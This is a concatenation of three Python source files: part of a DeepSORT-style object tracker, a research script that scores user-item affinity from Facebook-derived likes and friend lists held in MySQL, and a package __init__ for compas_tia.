scores = np.array([d.confidence for d in detections])
if self.nms_max_overlap < 1.0:
# nms_tic = time.perf_counter()
indices = non_max_suppression(
boxes, self.nms_max_overlap, scores)
# nms_toc = time.perf_counter()
# logger.debug(f'nms time: {nms_toc-nms_tic}s')
detections = [detections[i] for i in indices]
# Update tracker.
self.tracker.predict()
self.tracker.update(detections)
return self.tracker.tracks
def refresh_track_ids(self):
self.tracker._next_id
def generate_embeds(self, frame, raw_dets):
crops = self.crop_bb(frame, raw_dets)
return self.embedder.predict(crops)
def generate_embeds_poly(self, frame, polygons, bounding_rects):
crops = self.crop_poly_pad_black(frame, polygons, bounding_rects)
return self.embedder.predict(crops)
def create_detections(self, raw_dets, embeds):
detection_list = []
for raw_det, embed in zip(raw_dets,embeds):
detection_list.append(Detection(raw_det[0], raw_det[1], embed, class_name=raw_det[2])) #raw_det = [bbox, conf_score, class]
return detection_list
def create_detections_poly(self, dets, embeds, bounding_rects):
detection_list = []
dets.extend([embeds, bounding_rects])
for raw_polygon, cl, score, embed, bounding_rect in zip(*dets):
x,y,w,h = bounding_rect
x = max(0, x)
y = max(0, y)
bbox = [x,y,w,h]
detection_list.append(Detection(bbox, score, embed, class_name=cl, others=raw_polygon))
return detection_list
@staticmethod
def process_polygons(raw_polygons):
polygons = [ [ polygon[x:x+2] for x in range(0, len(polygon), 2) ]for polygon in raw_polygons ]
bounding_rects = [ cv2.boundingRect(np.array([polygon]).astype(int)) for polygon in polygons ]
return polygons, bounding_rects
@staticmethod
def crop_bb(frame, raw_dets):
crops = []
im_height, im_width = frame.shape[:2]
for detection in raw_dets:
l,t,w,h = [int(x) for x in detection[0]]
r = l + w
b = t + h
crop_l = max(0, l)
crop_r = min(im_width, r)
crop_t = max(0, t)
crop_b = min(im_height, b)
crops.append(frame[crop_t:crop_b, crop_l:crop_r])
return crops
@staticmethod
def crop_poly_pad_black(frame, polygons, bounding_rects):
masked_polys = []
im_height, im_width = frame.shape[:2]
for polygon, bounding_rect in zip(polygons, bounding_rects):
mask = np.zeros(frame.shape, dtype=np.uint8)
polygon_mask = np.array([polygon]).astype(int)
cv2.fillPoly(mask, polygon_mask, color=(255,255,255))
# apply the mask
masked_image = cv2.bitwise_and(frame, mask)
# crop masked image
x,y,w,h = bounding_rect
crop_l = max(0, x)
crop_r = min(im_width, x+w)
crop_t = max(0, y)
crop_b = min(im_height, y+h)
cropped = masked_image[crop_t:crop_b, crop_l:crop_r].copy()
masked_polys.append(np.array(cropped))
return masked_polys
| 2.15625 | 2 |
data_preprocessing/generate_user_relation_network.py | wangleye/KOL_marketing | 0 | 12762249 | import pymysql
conn = pymysql.connect(host='127.0.0.1',
user='root',
passwd='<PASSWORD>',
db='all0504')
def get_user_set():
user_set = set()
with open('../facebook/KOL_audience') as input_user_file:
for line in input_user_file:
if line.strip() == '':
continue
words = line.strip().split(';')
user_ids = set(words[1].split(' '))
user_set = user_set.union(user_ids)
return user_set
def get_item_set(num=100):
item_set = set()
count = 0
with open('../facebook/{}_list'.format(SCENARIO)) as input_item_file:
for line in input_item_file:
if line.strip() == '':
continue
count += 1
item_info = line.strip().split()
item_set.add(item_info[0])
if count == num:
break
return item_set
def read_user_item_preference(user_set):
user_item_likes = {}
x = conn.cursor()
x.execute("SELECT iduser, {}str FROM user".format(SCENARIO))
results = x.fetchall()
for result in results:
user_id = result[0]
moviestr_items = result[1].split(';')
if user_id in user_set or len(user_set) == 0:
user_item_likes[user_id] = set()
for movie_i in moviestr_items:
user_item_likes[user_id].add(movie_i)
return user_item_likes, set(user_item_likes.keys())
def read_user_relationship(user_set):
user_relationship = {}
for user in user_set:
user_relationship[user] = set()
x = conn.cursor()
x.execute("SELECT iduser, friendstr FROM user")
results = x.fetchall()
for result in results:
user_id = result[0]
if user_id not in user_set:
continue
friends = result[1].split(';')
for friend in friends:
user_relationship[user_id].add(friend)
return user_relationship
def read_item_similarity_from_file():
SIM = {}
with open("../facebook/{}_similarity".format(SCENARIO)) as inputfile:
for line in inputfile:
line = line.strip()
if len(line) > 0:
words = line.split()
item1 = words[0]
item2 = words[1]
similarity = float(words[2])
if item1 not in SIM:
SIM[item1] = {}
SIM[item1][item2] = similarity
return SIM
def calculate_user_similairity(user1, user2):
if user1 not in USER_PREF or user2 not in USER_PREF:
return 0
num_co_liked_item = len(USER_PREF[user1] & USER_PREF[user2])
if num_co_liked_item == 0:
user_sim = 0
else:
user_sim = num_co_liked_item*1.0 / (len(USER_PREF[user2])+1)
return user_sim
def get_item_similarity(item1, item2):
if item1 not in ITEM_SIM or item2 not in ITEM_SIM[item1]:
return 0
return ITEM_SIM[item1][item2]
def user_item_affinity(user_id, target_item, consider_item=True, consider_friend=True, indirect_friend=False, inindirect_friend=False): #indirect_friends: whether consider indirect friends
score = 0
for item in ITEM_SET:
if item in USER_PREF[user_id]:
score += get_item_similarity(target_item, item)
if score == 0:
return 0 # early stop the users whith no item similarity (if continue, too slow for the algorithm)
if not consider_item:
score = 0.0001
considered_f = set()
if consider_friend:
for friend in USER_RELATION[user_id]:
if friend in USER_PREF and target_item in USER_PREF[friend]:
score += calculate_user_similairity(user_id, friend)
considered_f.add(friend)
# if counting indirect friends
if indirect_friend and (friend in USER_RELATION):
friends_of_f = USER_RELATION[friend]
for friend_of_f in friends_of_f:
if (friend_of_f in USER_PREF) and (friend_of_f not in considered_f) and target_item in USER_PREF[friend_of_f]:
# score += calculate_user_similairity(user_id, friend) * calculate_user_similairity(friend, friend_of_f)
score += calculate_user_similairity(user_id, friend_of_f)
considered_f.add(friend_of_f)
# if counting inindirect friends
if inindirect_friend and (friend_of_f in USER_RELATION):
for fff in USER_RELATION[friend_of_f]:
if (fff in USER_PREF) and (fff not in considered_f) and target_item in USER_PREF[fff]:
# score += calculate_user_similairity(user_id, friend) * calculate_user_similairity(friend, friend_of_f) * calculate_user_similairity(friend_of_f, fff)
score += calculate_user_similairity(user_id, fff)
considered_f.add(fff)
return score
def output_user_item_aff():
with open("user_{}_aff_score_100_both".format(SCENARIO), "w") as outputfile:
outputfile.write('user {} score truth\n'.format(SCENARIO))
for user in USER_SET:
if user not in USER_PREF:
continue
for item in ITEM_SET:
score = user_item_affinity(user, item, consider_item=True, consider_friend=True)
isTrue = 1 if item in USER_PREF[user] else 0
if score > 0:
outputfile.write('{} {} {} {}\n'.format(user, item, score, isTrue))
def output_user_item_aff_only_item():
with open("user_{}_aff_score_100_only_item".format(SCENARIO), "w") as outputfile:
outputfile.write('user {} score truth\n'.format(SCENARIO))
for user in USER_SET:
if user not in USER_PREF:
continue
for item in ITEM_SET:
score = user_item_affinity(user, item, consider_item=True, consider_friend=False)
isTrue = 1 if item in USER_PREF[user] else 0
if score > 0:
outputfile.write('{} {} {} {}\n'.format(user, item, score, isTrue))
def output_user_item_aff_only_friend():
with open("user_{}_aff_score_100_only_friend".format(SCENARIO), "w") as outputfile:
outputfile.write('user {} score truth\n'.format(SCENARIO))
for user in USER_SET:
if user not in USER_PREF:
continue
for item in ITEM_SET:
score = user_item_affinity(user, item, consider_item=False, consider_friend=True)
isTrue = 1 if item in USER_PREF[user] else 0
if score > 0:
outputfile.write('{} {} {} {}\n'.format(user, item, score, isTrue))
if __name__ == '__main__':
SCENARIO = 'book'
print('reading user set...')
USER_SET = get_user_set()
print('reading item set...')
ITEM_SET = get_item_set()
print('reading user preference...')
USER_PREF, USER_SET = read_user_item_preference(USER_SET)
print(len(USER_PREF.keys()))
print('reading user relationship...')
USER_RELATION = read_user_relationship(USER_SET)
print('reading item similarity...')
ITEM_SIM = read_item_similarity_from_file()
print('outputing to file...')
output_user_item_aff()
#output_user_item_aff_only_item()
#output_user_item_aff_only_friend()
| 2.890625 | 3 |
src/compas_tia/__init__.py | KIKI007/compas_tia | 0 | 12762250 | <reponame>KIKI007/compas_tia
"""
********************************************************************************
compas_tia
********************************************************************************
.. currentmodule:: compas_tia
.. toctree::
:maxdepth: 1
"""
from __future__ import print_function
import os
__author__ = ["<NAME>"]
__copyright__ = "Ziqi Wang"
__license__ = "MIT License"
__email__ = "<EMAIL>"
__version__ = "0.1.0"
HERE = os.path.dirname(__file__)
HOME = os.path.abspath(os.path.join(HERE, "../../"))
DATA = os.path.abspath(os.path.join(HOME, "data"))
DOCS = os.path.abspath(os.path.join(HOME, "docs"))
TEMP = os.path.abspath(os.path.join(HOME, "temp"))
from ._tia_datastructure import * # noqa: F401 F403
__all__ = [name for name in dir() if not name.startswith('_')]
| 1.6875 | 2 |